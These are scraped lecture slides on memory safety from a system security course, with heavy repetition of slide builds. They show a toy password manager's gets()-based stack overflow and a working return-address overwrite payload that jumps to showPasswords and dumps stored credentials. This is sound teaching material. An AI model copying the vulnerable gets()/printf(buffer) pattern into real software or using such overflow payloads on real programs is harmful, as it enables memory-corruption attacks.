![Page 102: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/102.jpg)
Back to the Example: A Simple Password Manager www.tugraz.at
• We want to enter a weird state
• Can we find a bug in the program?
• Can we abuse it to enter a weird state?
• First hint of a bug when compiling:
pwdman.c:(.text+0x2e): warning: the ‘gets’ function is dangerous
and should not be used.
Ñ Check the man page of gets
20 Michael Schwarz — www.iaik.tugraz.at
![Page 103: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/103.jpg)
man getsGETS(3) Linux Programmer's Manual GETS(3)
NAMEgets - get a string from standard input (DEPRECATED)
SYNOPSIS#include <stdio.h>
char *gets(char *s);
DESCRIPTIONNever use this function.
gets() reads a line from stdin into the buffer pointed to by s until either a terminating newline or EOF, which it replaces with a null byte('\0'). No check for buffer overrun is performed (see BUGS below).
RETURN VALUEgets() returns s on success, and NULL on error or when end of file occurs while no characters have been read. However, given the lack of bufferoverrun checking, there can be no guarantees that the function will even return.
ATTRIBUTESFor an explanation of the terms used in this section, see attributes(7).
┌──────────┬───────────────┬─────────┐│Interface │ Attribute │ Value │├──────────┼───────────────┼─────────┤│gets() │ Thread safety │ MT-Safe │└──────────┴───────────────┴─────────┘
CONFORMING TOC89, C99, POSIX.1-2001.
LSB deprecates gets(). POSIX.1-2008 marks gets() obsolescent. ISO C11 removes the specification of gets() from the C language, and since version2.16, glibc header files don't expose the function declaration if the _ISOC11_SOURCE feature test macro is defined.
BUGSNever use gets(). Because it is impossible to tell without knowing the data in advance how many characters gets() will read, and because gets()will continue to store characters past the end of the buffer, it is extremely dangerous to use. It has been used to break computer security. Usefgets() instead.
For more information, see CWE-242 (aka "Use of Inherently Dangerous Function") at http://cwe.mitre.org/data/definitions/242.html
SEE ALSOread(2), write(2), ferror(3), fgetc(3), fgets(3), fgetwc(3), fgetws(3), fopen(3), fread(3), fseek(3), getline
![Page 104: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/104.jpg)
Where is the Bug? www.tugraz.at
• Code part where gets is used:
uint32_t readPIN() {
char buffer[16];
printf("Enter PIN:\n");
gets(buffer);
if(getenv("DEBUG")) printf(buffer);
return atoi(buffer);
}
• The buffer array has space for 16 characters
• gets reads until EOF...
21 Michael Schwarz — www.iaik.tugraz.at
![Page 105: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/105.jpg)
Where is the Bug? www.tugraz.at
• Code part where gets is used:
uint32_t readPIN() {
char buffer[16];
printf("Enter PIN:\n");
gets(buffer);
if(getenv("DEBUG")) printf(buffer);
return atoi(buffer);
}
• The buffer array has space for 16 characters
• gets reads until EOF...
21 Michael Schwarz — www.iaik.tugraz.at
![Page 106: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/106.jpg)
Where is the Bug? www.tugraz.at
• Code part where gets is used:
uint32_t readPIN() {
char buffer[16];
printf("Enter PIN:\n");
gets(buffer);
if(getenv("DEBUG")) printf(buffer);
return atoi(buffer);
}
• The buffer array has space for 16 characters
• gets reads until EOF...
21 Michael Schwarz — www.iaik.tugraz.at
![Page 107: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/107.jpg)
Trigger the Bug www.tugraz.at
% ./pwdman
Enter PIN:
1234
Wrong PIN!
Enter PIN:
0123456789012345678901234567890123456789
[1] 7106 segmentation fault (core dumped) ./pwdman
pwdman[7486]: segfault at 31303938 ip 0000000031303938
sp 00000000ffffcdc0 error 14 in
libc-2.23.so[f7de2000+1b0000]
22 Michael Schwarz — www.iaik.tugraz.at
![Page 108: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/108.jpg)
Trigger the Bug www.tugraz.at
% ./pwdman
Enter PIN:
1234
Wrong PIN!
Enter PIN:
0123456789012345678901234567890123456789
[1] 7106 segmentation fault (core dumped) ./pwdman
pwdman[7486]: segfault at 31303938 ip 0000000031303938
sp 00000000ffffcdc0 error 14 in
libc-2.23.so[f7de2000+1b0000]
22 Michael Schwarz — www.iaik.tugraz.at
![Page 109: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/109.jpg)
Trigger the Bug www.tugraz.at
% ./pwdman
Enter PIN:
1234
Wrong PIN!
Enter PIN:
0123456789012345678901234567890123456789
[1] 7106 segmentation fault (core dumped) ./pwdman
pwdman[7486]: segfault at 31303938 ip 0000000031303938
sp 00000000ffffcdc0 error 14 in
libc-2.23.so[f7de2000+1b0000]
22 Michael Schwarz — www.iaik.tugraz.at
![Page 110: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/110.jpg)
We are in a Weird State! www.tugraz.at
• We crash the program
• Crashing Ñ not a state in our FSM
Ñ Weird state due to a programming mistake
• #1: Why did we get into this weird state?
• #2: What is this weird state?
• #3: How can we program our weird machine to do something
useful (instead of crashing)?
23 Michael Schwarz — www.iaik.tugraz.at
![Page 111: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/111.jpg)
We are in a Weird State! www.tugraz.at
• We crash the program
• Crashing Ñ not a state in our FSM
Ñ Weird state due to a programming mistake
• #1: Why did we get into this weird state?
• #2: What is this weird state?
• #3: How can we program our weird machine to do something
useful (instead of crashing)?
23 Michael Schwarz — www.iaik.tugraz.at
![Page 112: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/112.jpg)
We are in a Weird State! www.tugraz.at
• We crash the program
• Crashing Ñ not a state in our FSM
Ñ Weird state due to a programming mistake
• #1: Why did we get into this weird state?
• #2: What is this weird state?
• #3: How can we program our weird machine to do something
useful (instead of crashing)?
23 Michael Schwarz — www.iaik.tugraz.at
![Page 113: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/113.jpg)
We are in a Weird State! www.tugraz.at
• We crash the program
• Crashing Ñ not a state in our FSM
Ñ Weird state due to a programming mistake
• #1: Why did we get into this weird state?
• #2: What is this weird state?
• #3: How can we program our weird machine to do something
useful (instead of crashing)?
23 Michael Schwarz — www.iaik.tugraz.at
![Page 114: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/114.jpg)
We are in a Weird State! www.tugraz.at
• We crash the program
• Crashing Ñ not a state in our FSM
Ñ Weird state due to a programming mistake
• #1: Why did we get into this weird state?
• #2: What is this weird state?
• #3: How can we program our weird machine to do something
useful (instead of crashing)?
23 Michael Schwarz — www.iaik.tugraz.at
![Page 115: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/115.jpg)
We are in a Weird State! www.tugraz.at
• We crash the program
• Crashing Ñ not a state in our FSM
Ñ Weird state due to a programming mistake
• #1: Why did we get into this weird state?
• #2: What is this weird state?
• #3: How can we program our weird machine to do something
useful (instead of crashing)?
23 Michael Schwarz — www.iaik.tugraz.at
![Page 116: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/116.jpg)
#1: The Why www.tugraz.at
• gets reads from the user until EOF
• Everything read is stored in an array
• Arrays have a defined size
• What if we write more data into the array?
• We write into something else adjacent in memory
24 Michael Schwarz — www.iaik.tugraz.at
![Page 117: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/117.jpg)
#1: The Why www.tugraz.at
• gets reads from the user until EOF
• Everything read is stored in an array
• Arrays have a defined size
• What if we write more data into the array?
• We write into something else adjacent in memory
24 Michael Schwarz — www.iaik.tugraz.at
![Page 118: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/118.jpg)
#1: The Why www.tugraz.at
• gets reads from the user until EOF
• Everything read is stored in an array
• Arrays have a defined size
• What if we write more data into the array?
• We write into something else adjacent in memory
24 Michael Schwarz — www.iaik.tugraz.at
![Page 119: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/119.jpg)
#1: The Why www.tugraz.at
• gets reads from the user until EOF
• Everything read is stored in an array
• Arrays have a defined size
• What if we write more data into the array?
• We write into something else adjacent in memory
24 Michael Schwarz — www.iaik.tugraz.at
![Page 120: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/120.jpg)
#1: The Why www.tugraz.at
• gets reads from the user until EOF
• Everything read is stored in an array
• Arrays have a defined size
• What if we write more data into the array?
• We write into something else adjacent in memory
24 Michael Schwarz — www.iaik.tugraz.at
![Page 121: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/121.jpg)
#1: The Why - Recap: Memory Layout www.tugraz.at
• What is next to the variable?
• It is a local variable, therefore it is on the stack
• Other local variables adjacent (none here)
• What else is on the stack?
25 Michael Schwarz — www.iaik.tugraz.at
![Page 122: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/122.jpg)
#1: The Why - Recap: Memory Layout www.tugraz.at
• What is next to the variable?
• It is a local variable, therefore it is on the stack
• Other local variables adjacent (none here)
• What else is on the stack?
25 Michael Schwarz — www.iaik.tugraz.at
![Page 123: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/123.jpg)
#1: The Why - Recap: Memory Layout www.tugraz.at
• What is next to the variable?
• It is a local variable, therefore it is on the stack
• Other local variables adjacent (none here)
• What else is on the stack?
25 Michael Schwarz — www.iaik.tugraz.at
![Page 124: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/124.jpg)
#1: The Why - Recap: Memory Layout www.tugraz.at
• What is next to the variable?
• It is a local variable, therefore it is on the stack
• Other local variables adjacent (none here)
• What else is on the stack?
25 Michael Schwarz — www.iaik.tugraz.at
![Page 125: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/125.jpg)
#1: The Why - Recap: Stack www.tugraz.at
0x7FF... saved return addresssaved base pointer
local variables
+
last frame
0x000...
,
/
.
/
-
26 Michael Schwarz — www.iaik.tugraz.at
![Page 126: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/126.jpg)
#1: The Why - Recap: Stack www.tugraz.at
0x7FF... saved return addresssaved base pointer
local variables
+
last frame
saved return address
0x000...
,
/
.
/
-
current frame
26 Michael Schwarz — www.iaik.tugraz.at
![Page 127: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/127.jpg)
#1: The Why - Recap: Stack www.tugraz.at
0x7FF... saved return addresssaved base pointer
local variables
+
last frame
saved return addresssaved base pointer
0x000...
,
/
.
/
-
current frame
26 Michael Schwarz — www.iaik.tugraz.at
![Page 128: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/128.jpg)
#1: The Why - Recap: Stack www.tugraz.at
0x7FF... saved return addresssaved base pointer
local variables
+
last frame
saved return addresssaved base pointer
local variables0x000... ...
,
/
.
/
-
current frame
26 Michael Schwarz — www.iaik.tugraz.at
![Page 129: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/129.jpg)
#1: The Way - Overwriting the Stack www.tugraz.at
uint32_t readPIN() {
char buffer[16];
printf("Enter PIN:\n");
gets(buffer);
if(getenv("DEBUG")) printf(
buffer);
return atoi(buffer);
}
Ñ ...
,
/
/
/
/
.
/
/
/
/
-
27 Michael Schwarz — www.iaik.tugraz.at
![Page 130: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/130.jpg)
#1: The Way - Overwriting the Stack www.tugraz.at
uint32_t readPIN() {
char buffer[16];
printf("Enter PIN:\n");
gets(buffer);
if(getenv("DEBUG")) printf(
buffer);
return atoi(buffer);
}
...
Ñ IP
,
/
/
/
/
.
/
/
/
/
-
27 Michael Schwarz — www.iaik.tugraz.at
![Page 131: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/131.jpg)
#1: The Way - Overwriting the Stack www.tugraz.at
uint32_t readPIN() {
char buffer[16];
printf("Enter PIN:\n");
gets(buffer);
if(getenv("DEBUG")) printf(
buffer);
return atoi(buffer);
}
...
IPÑ BP
,
/
/
/
/
.
/
/
/
/
-
27 Michael Schwarz — www.iaik.tugraz.at
![Page 132: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/132.jpg)
#1: The Way - Overwriting the Stack www.tugraz.at
uint32_t readPIN() {
char buffer[16];
printf("Enter PIN:\n");
gets(buffer);
if(getenv("DEBUG")) printf(
buffer);
return atoi(buffer);
}
...
IPÑ BP
,
/
/
/
/
.
/
/
/
/
-
buffer
27 Michael Schwarz — www.iaik.tugraz.at
![Page 133: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/133.jpg)
#1: The Way - Overwriting the Stack www.tugraz.at
uint32_t readPIN() {
char buffer[16];
printf("Enter PIN:\n");
gets(buffer);
if(getenv("DEBUG")) printf(
buffer);
return atoi(buffer);
}
...
IP 0x31303938Ñ BP 0x37363534
0x333231300x393837360x353433320x313039380x373635340x33323130
,
/
/
/
/
.
/
/
/
/
-
buffer
27 Michael Schwarz — www.iaik.tugraz.at
![Page 134: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/134.jpg)
#1: The Way - Overwriting the Stack www.tugraz.at
uint32_t readPIN() {
char buffer[16];
printf("Enter PIN:\n");
gets(buffer);
if(getenv("DEBUG")) printf(
buffer);
return atoi(buffer);
}
...
Ñ IP 0x31303938BP 0x37363534
0x333231300x393837360x353433320x313039380x373635340x33323130
,
/
/
/
/
.
/
/
/
/
-
buffer
Return, continue at 0x31303938
27 Michael Schwarz — www.iaik.tugraz.at
![Page 135: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/135.jpg)
#2: The What www.tugraz.at
• We are somewhere (more specific: at address 0x31303938)
• CPU tries to execute code at this address
• Probably nothing mapped at this address Ñ pagefault
• Operating system kills application with a segmentation fault
• Weird state: CPU trying to execute code at an invalid address
28 Michael Schwarz — www.iaik.tugraz.at
![Page 136: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/136.jpg)
#2: The What www.tugraz.at
• We are somewhere (more specific: at address 0x31303938)
• CPU tries to execute code at this address
• Probably nothing mapped at this address Ñ pagefault
• Operating system kills application with a segmentation fault
• Weird state: CPU trying to execute code at an invalid address
28 Michael Schwarz — www.iaik.tugraz.at
![Page 137: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/137.jpg)
#2: The What www.tugraz.at
• We are somewhere (more specific: at address 0x31303938)
• CPU tries to execute code at this address
• Probably nothing mapped at this address Ñ pagefault
• Operating system kills application with a segmentation fault
• Weird state: CPU trying to execute code at an invalid address
28 Michael Schwarz — www.iaik.tugraz.at
![Page 138: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/138.jpg)
#2: The What www.tugraz.at
• We are somewhere (more specific: at address 0x31303938)
• CPU tries to execute code at this address
• Probably nothing mapped at this address Ñ pagefault
• Operating system kills application with a segmentation fault
• Weird state: CPU trying to execute code at an invalid address
28 Michael Schwarz — www.iaik.tugraz.at
![Page 139: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/139.jpg)
#2: The What www.tugraz.at
• We are somewhere (more specific: at address 0x31303938)
• CPU tries to execute code at this address
• Probably nothing mapped at this address Ñ pagefault
• Operating system kills application with a segmentation fault
• Weird state: CPU trying to execute code at an invalid address
28 Michael Schwarz — www.iaik.tugraz.at
![Page 140: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/140.jpg)
#3: The How www.tugraz.at
• Bring the CPU in weird state by entering too many characters
• Control what the CPU executes by setting the instruction
pointer
• We want to either
• stay in a weird, but useful state, or
• go to a (useful) sane state again
• Let’s try to get to the sane state “Show Password List” first...
29 Michael Schwarz — www.iaik.tugraz.at
![Page 141: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/141.jpg)
#3: The How www.tugraz.at
• Bring the CPU in weird state by entering too many characters
• Control what the CPU executes by setting the instruction
pointer
• We want to either
• stay in a weird, but useful state, or
• go to a (useful) sane state again
• Let’s try to get to the sane state “Show Password List” first...
29 Michael Schwarz — www.iaik.tugraz.at
![Page 142: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/142.jpg)
#3: The How www.tugraz.at
• Bring the CPU in weird state by entering too many characters
• Control what the CPU executes by setting the instruction
pointer
• We want to either
• stay in a weird, but useful state, or
• go to a (useful) sane state again
• Let’s try to get to the sane state “Show Password List” first...
29 Michael Schwarz — www.iaik.tugraz.at
![Page 143: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/143.jpg)
#3: The How www.tugraz.at
• Bring the CPU in weird state by entering too many characters
• Control what the CPU executes by setting the instruction
pointer
• We want to either
• stay in a weird, but useful state, or
• go to a (useful) sane state again
• Let’s try to get to the sane state “Show Password List” first...
29 Michael Schwarz — www.iaik.tugraz.at
![Page 144: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/144.jpg)
#3: The How - Go to an useful sane state www.tugraz.at
• We can let the CPU execute code at an arbitrary location
• The showPasswords function is at some location
% readelf -s pwdman | grep showPasswords
64: 08048604 121 FUNC GLOBAL DEFAULT 14 showPasswords
• PIN should look like this: ăpaddingą\x04\x86\x04\x08• padding fills the buffer (plus saved base pointer), address overwrites the saved
instruction pointer
30 Michael Schwarz — www.iaik.tugraz.at
![Page 145: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/145.jpg)
#3: The How - Go to an useful sane state www.tugraz.at
• We can let the CPU execute code at an arbitrary location
• The showPasswords function is at some location
% readelf -s pwdman | grep showPasswords
64: 08048604 121 FUNC GLOBAL DEFAULT 14 showPasswords
• PIN should look like this: ăpaddingą\x04\x86\x04\x08• padding fills the buffer (plus saved base pointer), address overwrites the saved
instruction pointer
30 Michael Schwarz — www.iaik.tugraz.at
![Page 146: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/146.jpg)
#3: The How - Go to an useful sane state www.tugraz.at
• We can let the CPU execute code at an arbitrary location
• The showPasswords function is at some location
% readelf -s pwdman | grep showPasswords
64: 08048604 121 FUNC GLOBAL DEFAULT 14 showPasswords
• PIN should look like this: ăpaddingą\x04\x86\x04\x08• padding fills the buffer (plus saved base pointer), address overwrites the saved
instruction pointer
30 Michael Schwarz — www.iaik.tugraz.at
![Page 147: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/147.jpg)
#3: The How - Break the Security Properties www.tugraz.at
echo "AAAAAAAAAAAAAAAAAAAAAAAAAAAA\x04\x86\x04\x08" | ./pwdman
Enter PIN:
root:toor
user:password1234
[1] 17074 segmentation fault (core dumped) ./pwdman
31 Michael Schwarz — www.iaik.tugraz.at
![Page 148: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/148.jpg)
#3: The How - Break the Security Properties www.tugraz.at
echo "AAAAAAAAAAAAAAAAAAAAAAAAAAAA\x04\x86\x04\x08" | ./pwdman
Enter PIN:
root:toor
user:password1234
[1] 17074 segmentation fault (core dumped) ./pwdman
31 Michael Schwarz — www.iaik.tugraz.at
![Page 149: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/149.jpg)
Summary www.tugraz.at
• We broke the security properties of the FSM
• Setup: We started in the sane state “Read PIN”
• Instantiation: Too many characters led to a weird state
• Programming: We “programmed” the weird state using the
input to move to the sane state “Show Password List”
• We have successfully developed an exploit
32 Michael Schwarz — www.iaik.tugraz.at
![Page 150: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/150.jpg)
Summary www.tugraz.at
• We broke the security properties of the FSM
• Setup: We started in the sane state “Read PIN”
• Instantiation: Too many characters led to a weird state
• Programming: We “programmed” the weird state using the
input to move to the sane state “Show Password List”
• We have successfully developed an exploit
32 Michael Schwarz — www.iaik.tugraz.at
![Page 151: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/151.jpg)
Summary www.tugraz.at
• We broke the security properties of the FSM
• Setup: We started in the sane state “Read PIN”
• Instantiation: Too many characters led to a weird state
• Programming: We “programmed” the weird state using the
input to move to the sane state “Show Password List”
• We have successfully developed an exploit
32 Michael Schwarz — www.iaik.tugraz.at
![Page 152: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/152.jpg)
Summary www.tugraz.at
• We broke the security properties of the FSM
• Setup: We started in the sane state “Read PIN”
• Instantiation: Too many characters led to a weird state
• Programming: We “programmed” the weird state using the
input to move to the sane state “Show Password List”
• We have successfully developed an exploit
32 Michael Schwarz — www.iaik.tugraz.at
![Page 153: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/153.jpg)
Summary www.tugraz.at
• We broke the security properties of the FSM
• Setup: We started in the sane state “Read PIN”
• Instantiation: Too many characters led to a weird state
• Programming: We “programmed” the weird state using the
input to move to the sane state “Show Password List”
• We have successfully developed an exploit
32 Michael Schwarz — www.iaik.tugraz.at
![Page 154: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/154.jpg)
Can we do more? www.tugraz.at
• Spatial memory safety violation to overwrite data
Ñ Weird state
• Do we have to overwrite the saved instruction pointer?
• Other memory safety violations?
• Write in a more powerful “weird machine language”?
33 Michael Schwarz — www.iaik.tugraz.at
![Page 155: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/155.jpg)
Can we do more? www.tugraz.at
• Spatial memory safety violation to overwrite data
Ñ Weird state
• Do we have to overwrite the saved instruction pointer?
• Other memory safety violations?
• Write in a more powerful “weird machine language”?
33 Michael Schwarz — www.iaik.tugraz.at
![Page 156: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/156.jpg)
Can we do more? www.tugraz.at
• Spatial memory safety violation to overwrite data
Ñ Weird state
• Do we have to overwrite the saved instruction pointer?
• Other memory safety violations?
• Write in a more powerful “weird machine language”?
33 Michael Schwarz — www.iaik.tugraz.at
![Page 157: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/157.jpg)
